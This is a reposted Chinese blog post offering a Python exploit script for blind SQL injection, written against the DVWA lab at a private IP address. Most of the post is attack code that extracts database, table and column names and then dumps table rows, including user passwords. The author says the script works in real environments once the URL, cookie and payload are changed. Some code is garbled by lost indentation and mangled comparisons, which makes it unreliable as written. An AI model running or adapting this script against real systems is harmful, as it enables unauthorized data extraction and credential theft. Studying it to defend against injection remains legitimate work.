Python安全之编写SQL注入漏洞利用脚本(EXP)

最新推荐文章于 2024-05-23 16:17:43 发布
最新推荐文章于 2024-05-23 16:17:43 发布
阅读量1.4k 收藏 8
点赞数
文章标签: python 安全 sql
原文链接:https://blog.csdn.net/weixin_43853965/article/details/107197140
版权

背景:
最近护网在一次渗透测试过程发现了一处SQL盲注,在SQLMAP上跑了下居然没跑出结果,原因不明也没过多分析。于是自己写了个简单脚本作为测试。本例中以靶机DVWA中的盲注为例。实际工作中将脚本中的cookie、sql_payload、url以及请求方式修改成你实际环境中的就可以用了。最终执行效果如下:
在这里插入图片描述

代码比较简单,值得一提的是怎么判断库名所有字符已经结束了,我用的是计数器。计数器num每次遍历+1;计数器a每次查找成功+1。当查找为空时a就不再加,导致num>a。也就是说当num和a不相等时,说明库名所有字符查找完了,此时break并输出整个库名。但是,查询表内数据的时候不能用这种方法,因为表内数据可能包含空格,当遇到空格时程序就会误判,此时就需要先计算整个字符串的长度(length),无论数据有没有空格,遍历完整个长度才结束。
代码:

import requests
import time
import prettytable as pt

proxies = {‘http’: ‘http://127.0.0.1:8080’,
‘https’: ‘http://127.0.0.1:8080’}
cookie = {‘security’:‘low’,‘PHPSESSID’: ‘qh6b2rg1b3h9nqbfacbkj845g6’}
s = requests.session()

def main():
pass

查看当前数据库名函数

def get_database():
name_list=[]
a = 1
for i in range(1,15):
num=i
if num!=a:
name = ‘’.join(name_list)
print(‘[*]当前数据库名:’ + name)
break

    for letter in range(65, 91):
        x=chr(letter).lower()
        y="'"+chr(letter).lower()+"'"
        sql_payload="1'and "+y+"=(select substring(DATABASE(),"+str(num)+",1))-- "
        cookie = {'security': 'high', 'PHPSESSID': 'pn5uejocpt14g05u6hcs05bm67','id':sql_payload}
        url = "http://192.168.8.13/vulnerabilities/sqli_blind/?id=" + sql_payload + "&Submit=Submit"
        rs = s.get(url, cookies=cookie)
        time.sleep(10)
        if 'User ID exists in the database' in rs.text:
            a+=1
            print('[*]当前第'+str(num)+'位:'+x)
            name_list.append(x)
            break

查询所有数据库名函数

def get_databases():
chars = ‘0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz_’
name_dict={}
for n in range(0,50):
z = str(n)
name_list = []
a = 1
for i in range(1,50):
if i!=a: #判断是否结束,当字符为空(也就是当a不再+1,所以不等于i的时候)时认为一个字符串结束了。
name = ‘’.join(name_list)
name_dict[n+1] = name
print(‘[*]第’+str(n+1)+‘个库名:’ + name)
break

        for char in chars:
            x = str(char)
            y = "'" + x + "'"
            sql_payload="1'and "+y+"=binary substring((SELECT SCHEMA_NAME FROM information_schema.SCHEMATA limit "+z+",1),"+str(i)+",1)-- "
            url="http://192.168.8.13/vulnerabilities/sqli_blind/?id="+sql_payload+"&Submit=Submit"
            rs = s.get(url, cookies=cookie)
            # time.sleep(10)
            if 'User ID exists in the database' in rs.text:
                a+=1
                # print('[*]当前第'+str(num)+'位:'+x)
                name_list.append(x)
                break
        # print(i,a)
        if i==1 and a==1:
            print('[*]所有库名查询完毕。')
            exit()

已知库名,查看表名函数

def get_tablename(database):
chars = ‘0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz_’
databasename=“'”+database+“'”
for n in range(0,50):
z = str(n)
tablename_list = []
a = 1
for table_str_num in range(1,50):
if a!=table_str_num:
name = ‘’.join(tablename_list)
print(‘[]第’+str(n+1)+‘表名:’ + name)
break
for char in chars:
x=str(char)
y=“'”+x+“'”
sql_payload=“1’and “+y+”=binary substr((select table_name from information_schema.tables where table_schema=”+databasename+" limit “+z+”,1),“+str(table_str_num)+”,1)-- "
url = “http://192.168.8.13/vulnerabilities/sqli_blind/?id=” + sql_payload + “&Submit=Submit”
rs = s.get(url, cookies=cookie)
# time.sleep(10)
if ‘User ID exists in the database’ in rs.text:
a += 1
# print('[]当前第’ + str(table_str_num) + ‘位:’ + x)
tablename_list.append(str(char))
break
if table_str_num1 and a1:
print(‘[*]所有表名查询完毕。’)
exit()

已知库名表名,查看列名函数及数据函数

def get_column(database,table):
name_dict = {}
chars = ‘0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz_’
tablename=“'”+table+“'”
for n in range(0,50):
z = str(n)
tablename_list = []
a = 1
for table_str_num in range(1,50):
if a!=table_str_num:
name = ‘’.join(tablename_list)
print(‘[]第’+str(n+1)+‘列列名:’ + name)
name_dict[n+1]=name
break
for char in chars:
x=str(char)
y=“'”+x+“'”
sql_payload=“1’and “+y+”=binary substr((SELECT COLUMN_NAME FROM information_schema.COLUMNS WHERE TABLE_NAME =”+tablename+" limit “+z+”,1),“+str(table_str_num)+”,1)-- "
url = “http://192.168.8.13/vulnerabilities/sqli_blind/?id=” + sql_payload + “&Submit=Submit”
rs = s.get(url, cookies=cookie)
# print(url)
# time.sleep(10)
if ‘User ID exists in the database’ in rs.text:
a += 1
# print('[]当前第’ + str(table_str_num) + ‘位:’ + x)
tablename_list.append(str(char))
break
if table_str_num1 and a1:
print(‘[*]所有列名查询完毕;开始查询表内数据:’)
# print(name_dict)
get_info(database,table,name_dict)
exit()

已知库名、表名、列字典查看表内数据函数

def get_info(database,table,name_dict):
tablename = database+“.”+ table
all_dict={} #所有行的数据保存到一个总字典
for n in range(0,65535): #行数、行号,这里最多查65535行,更严谨的方法是用select count(*)先计算行数,但考虑到太耗资源且意义不大就弃用了
z = str(n)
hang_dict={} #每行保存到一个行字典
for m in name_dict.values():
tablename_list = [] #每个单元格所有字符保存到一个列表中
a = 1
str_len=get_infolen(m,tablename,z)
if type(str_len) is int:
max_len=str_len+1
else:
max_len=0 #为空的时候实际返回的是 Notype,所以手工给个0

        # 如果第1个字段(name_dict[1])长度为空(max_len == 0),判断所有数据结束,格式化输出结果
        if m == name_dict[1] and max_len == 0:
            print('[*]已经查完所有行,格式化输出:')
            tb = pt.PrettyTable()
            key_list = []
            for i in all_dict[1].keys():
                key_list.append(i)
            tb.field_names = key_list
            for x in all_dict.values():
                value_list = []
                for y in x.values():
                    value_list.append(y)
                tb.add_row(value_list)
            # print(all_dict)
            print(tb)
            exit()

        # 遍历单元格中字符串的每位(substr函数)
        for table_str_num in range(1, max_len):  #位数
            for letter in range(32,123):    # unicode编码32到123之间的字符串
                y = "'" + chr(letter) + "'"
                sql_payload = "1'and " + y + "=binary substr((SELECT "+m+" FROM " + tablename + " limit " + z + ",1)," + str(table_str_num) + ",1)-- "
                url = "http://192.168.8.13/vulnerabilities/sqli_blind/?id=" + sql_payload + "&Submit=Submit"
                rs = s.get(url, cookies=cookie)
                if 'User ID exists in the database' in rs.text:
                    a += 1
                    # print('[*]当前第' + str(table_str_num) + '位:' +chr(letter))
                    tablename_list.append(chr(letter))  #每找到1个字符就追加到列表中
                    break
        # 一个单元格结束后打印一次
        name = ''.join(tablename_list)
        print('[*]第' + str(n + 1) + '行第'+m+'列' + name)
        hang_dict[m]=name   #一个单元格的数据作为值加入到行字典中,键是列名
    all_dict[n + 1] = hang_dict #每行结束将行字典作为值加入到总字典中,键是行号

计算表内每单元数据字符串长度函数

def get_infolen(m,tablename,z):
for b in range(0, 100):
c = “'” + str(b) + “'”
sql_len = "1’and " + c + "=length((SELECT " + m + " FROM " + tablename + " limit " + z + “,1))” + "-- "
url_len = “http://192.168.8.13/vulnerabilities/sqli_blind/?id=” + sql_len + “&Submit=Submit”
rs = s.get(url_len, cookies=cookie)
if ‘User ID exists in the database’ in rs.text:
return b

def test():
sql_payload = "1’and " + “‘+’” + "=substr((SELECT " + “user_id” + " FROM " + “dvwa.users” + " limit " + ‘0’ + “,1),” + ‘1’ + ",1)-- "
url = “http://192.168.8.13/vulnerabilities/sqli_blind/?id=” + sql_payload + “&Submit=Submit”
rs = s.get(url, cookies=cookie,proxies=proxies)
print(url)
time.sleep(10)

if name==‘main’:
# get_database()
# get_databases()
# get_tablename(‘dvwa’)
get_column(‘dvwa’,‘users’)
# name_dict={1: ‘USER_ID’, 2: ‘FIRST_NAME’, 3: ‘LAST_NAME’, 4: ‘USER’, 5: ‘PASSWORD’, 6: ‘AVATAR’, 7: ‘LAST_LOGIN’, 8: ‘FAILED_LOGIN’}
# get_info(‘dvwa’,‘users’,name_dict)

结语:
使用方法,
1、查当前库名和所有数据库名:直接执行函数,不需要传参,get_database()、get_databases();
2、查表名:需要传入数据库名,get_tablename(‘dvwa’);
3、查看数据:传入库名和表名查所有表的数据,类似SQLMAP中的-D指定库名 -T指定表名,get_column(‘dvwa’,‘users’);
————————————————
版权声明:本文为CSDN博主「沙漠网管」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/weixin_43853965/article/details/107197140

gaojian5422
关注
  • 0
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
手把手教你用Python轻松玩转SQL注入——渗透利器
pyjishu的博客
03-25 2164
前言 大家好,我是黄伟。相信大家经常有听到过SQL注入啥的,但是并不是特别了解;小编以前就是经常听别人说,但是自己啥都不懂,直到后来看了相关教材后才明白,原来是这么个东西,那么到底是什么东西了,又或者是不是个东西了?我们接着往下看。 一、浅谈SQL注入 SQL注入其实就是把SQL命令插入到WEB表单中提交或者输入一些页面请求的查询字符串,比如我们输网址,就是相当于这种操作,只不过我们不是在测试SQL注入漏洞,而仅仅只是为了输入后看到相应网页上的内容而已。一般方法有,如:猜数据表名,其次就是绕过后.
SQL住入原始脚本_SQL注入python脚本_
10-03
标题中的“SQL住入原始脚本”指的是利用SQL注入技术来编写或执行的原始SQL命令,而“SQL注入python脚本”则表明我们将探讨如何使用Python编写脚本来自动化这一过程。 SQL注入攻击主要有三种类型:直列注入、延时...
SQL盲注之python脚本自动化注入
菜鸟学安全的博客
12-18 1382
sql盲注无法使用sql语句注入,需要大量的判断语句或者延时注入。这样手动注入方式比较慢,手动发现注入点后可以使用python编写脚本注入。
手把手教你用Python轻松玩转SQL注入
最新发布
菜鸟学识的博客
05-23 1245
大家好,我是黄伟。相信大家经常有听到过SQL注入啥的,但是并不是特别了解;小编以前就是经常听别人说,但是自己啥都不懂,直到后来看了相关教材后才明白,原来是这么个东西,那么到底是什么东西了,又或者是不是个东西了?我们接着往下看。总的来说,SQL注入无非就是一段艰难险阻的路程,你可以发现但是别人也可以防御,虽然你发现要比较久的时间,但是人家防御却是很轻松,个人觉得得不偿失,不建议大家深入了解,只是做个简单的介绍了解下就好,至少你搜索技能因此而提高了不少吧。
pythonsql注入步骤_python 打造一个sql注入脚本 (一)
weixin_39809168的博客
11-30 505
0x00前言:昨天刚刚看完小迪老师的sql注入篇的第一章所以有了新的笔记。0x01笔记:sql注入原理:网站数据传输中,接受变量传递的值未进行过滤,导致直接带入数据库查询执行的操作。sql注入对渗透的作用:获取数据sql注入特性:攻击方法由数据库类型决定攻击结果由数据库决定漏洞代码:sql.php当我们在网页执行访问了:http://127.0.0.1/sql.php?x=1在数据库其实是这样的$...
python脚本(渗透测试)
weixin_56537388的博客
09-18 373
通过此脚本,可以爬取edusrc的目标信息,生成目标字典,为下一步开发自动化测试工具做准备。
python脚本之批量提取fofa的漏洞IP
Aesthetic99的博客
03-29 8989
python脚本之批量提取fofa的漏洞IP 前言: 本次python脚本是通过学习小迪师傅的课程学习而来,由于现在的fofa改变域名为fofa.info,所以下文中的python脚本中的一些值是根据目前的fofa网站改写的 脚本:(poc.py) import requests import base64 import time import sys from lxml import etree def fofa_search(search_data, page_data): #search_d
Exploit_Scripts:漏洞脚本
04-16
【标题】"漏洞脚本"涉及的是网络安全领域中利用漏洞进行攻击的技术,通常是指通过编写特定的代码(脚本)来触发系统或软件中的安全缺陷,以获取非法访问权限、控制目标系统或窃取敏感信息。这些脚本可以是自动化工具...
pwn_exp:pwn exps
04-19
"pwn exp"(pwn exploits)是指利用这些编程错误编写的具体攻击代码,用于在安全竞赛、漏洞挖掘或者恶意攻击中获取对目标系统的控制权。这个主题主要涉及到的是黑客技术、逆向工程和安全研究。 在给定的资源"pwn_...
第79天:Python开发-sqlmapapi&Tamper&Pocsuite1
08-03
Sqlmap是一款自动化的SQL注入工具,能够帮助开发者检测Web应用程序是否存在SQL注入漏洞。它通过检测输入参数与数据库之间的关系,尝试发现并利用可能的注入点。Sqlmap的Tamper模块允许用户自定义数据包篡改规则,以...
基于python连接oracle导并出数据文件
09-08
Python编程中,有时我们需要与不同的数据库进行交互,Oracle数据库就是其中之一。本文将详细讲解如何使用Python连接Oracle数据库并导出数据文件。 首先,我们引入了`param`类,用于检查命令行参数。在这个例子中...
Struts2-057漏洞检测python脚本
11-04
Struts2-057检测python脚本,支持命令回显,计算和弹计算器
sql注入程序(python2.7+pyqt4.8.5)
03-10
包含程序,还有两个jsp的测试网站(MSSQL、MySQL),程序带有详细的注释。
2013phpweb漏洞利用EXP
03-28
2013phpweb漏洞利用EXP
Exploit:常用的一些Exploit,经常会更新,也欢迎各位提交新的exp给我
04-28
1. **漏洞利用基础知识**:了解什么是exploit,以及它如何工作,包括常见的攻击技术,如缓冲区溢出、SQL注入、跨站脚本(XSS)等。 2. **Python编程技巧**:通过阅读和分析Python Exploit代码,可以学习到Python在...
myopic_exp0_a
07-11
loadData.py 是一个脚本,用于处理 sql 存储的数据,转换为 Pandas 数据帧,并清除数据收集中的怪癖 analysis0.py 被视为用于分析的运行脚本。 jbfunctions contians: jbprep:在 loadData 中使用的准备 jbgp.pyx...
sql注入:延时注入python万能脚本
一个努力学习网安的小牛马
11-08 260
【代码】sql注入:延时注入python脚本
python sql注入脚本_python打造一个分析网站SQL注入脚本
weixin_39546312的博客
02-09 112
1 importrequests,re,time,os2 from tqdm importtqdm3 from bs4 importBeautifulSoup4 defzhuru():5 globalx,headers,ps6 user=input('[+]Please enter the URL you want to test:') #用户输入要检测的网站7 url="...
Python中的10个常见安全漏洞及修复方法
gaojian5422的博客
02-28 1901
Python中的10个常见安全漏洞及修复方法
vsftp2.3.4 py脚本
12-10
vsftp2.3.4是一个流行的开源FTP服务器软件,用于在Linux系统上提供FTP服务。而py脚本则是一种使用Python编程语言编写脚本文件。在vsftp2.3.4中使用py脚本可以实现一些额外的功能扩展,比如自定义用户登录验证、日志记录、限速等。 通过编写py脚本,可以实现对vsftp2.3.4的定制化配置,例如根据用户的登录信息来动态控制其访问权限,或者根据特定的条件对用户的上传和下载速度进行限制。同时,py脚本还可以用来实现对用户行为的监控和日志记录,帮助管理员更好地了解用户的FTP使用情况并进行管理。 另外,利用py脚本还可以实现一些自动化操作,比如定时清理FTP服务器上的过期文件,或者对文件进行备份等操作。这些都可以通过编写py脚本来实现,在提高FTP服务器管理效率的同时还能提升安全性。 总的来说,vsftp2.3.4 py脚本的使用可以为FTP服务器的管理和运维提供更多的灵活性和定制化选项,帮助管理员更好地满足用户的需求,同时更好地保障FTP服务器的安全和稳定运行。因此,合理利用py脚本可以使vsftp2.3.4的功能更加强大和多样化。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值